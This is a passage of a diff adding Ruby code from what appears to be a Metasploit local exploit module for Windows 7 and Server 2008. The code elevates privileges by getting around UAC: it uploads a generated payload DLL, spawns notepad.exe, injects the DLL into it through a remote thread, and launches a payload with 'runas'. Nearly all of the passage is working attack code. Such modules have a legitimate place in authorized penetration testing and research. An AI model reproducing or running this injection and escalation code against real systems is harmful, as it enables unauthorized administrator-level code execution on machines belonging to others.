+    session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
+    print_status("Payload executed")
+  end
+
+
+
+
+  def run_injection(pid, dll_path)
+    vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
+    begin
+      vprint_status("Opening process #{pid}")
+      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+      exploit_mem, offset = inject_dll_into_process(host_process, dll_path)
+      vprint_status("Executing payload")
+      thread = host_process.thread.create(exploit_mem + offset, 0)
+      print_good("Successfully injected payload in to process: #{pid}")
+      client.railgun.kernel32.WaitForSingleObject(thread.handle,14000)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("Failed to Inject Payload to #{pid}!")
+      vprint_error(e.to_s)
+    end
+  end
+
+
+
+  def spawn_inject_proc
+    windir = expand_path("%WINDIR%").strip
+    print_status("Spawning process with Windows Publisher Certificate, to inject into...")
+    cmd = "#{windir}\\System32\\notepad.exe"
+    pid = cmd_exec_get_pid(cmd)
+
+    unless pid
+      fail_with(Exploit::Failure::Unknown, "Spawning Process failed...")
+    end
+
+    pid
+  end
+
+
+
+  def upload_payload_dll!
+    payload = generate_payload_dll({:dll_exitprocess => true})
+    print_status("Uploading the Payload DLL to the filesystem...")
+    begin
+      vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
+      write_file(payload_filepath, payload)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(
+          Exploit::Exception::Unknown,
+          "Error uploading file #{payload_filepath}: #{e.class} #{e}"
+      )
+    end
+  end
+
+
+
+
+  def validate_environment!
+    fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
+
+    winver = sysinfo["OS"]
+
+    unless winver =~ /Windows 2008|Windows [7]/
+      fail_with(Exploit::Failure::NotVulnerable, "#{winver} is not vulnerable.")
+    end
+
+    if is_uac_enabled?
+      print_status "UAC is Enabled, checking level..."
+    else
+      if is_in_admin_group?
+        fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
+      else
+        fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
+      end
+    end
+  end
+
+end
+